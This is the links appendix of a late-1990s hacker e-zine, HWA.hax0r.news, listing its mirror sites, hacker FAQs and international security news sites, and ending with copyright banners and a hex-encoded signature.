------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]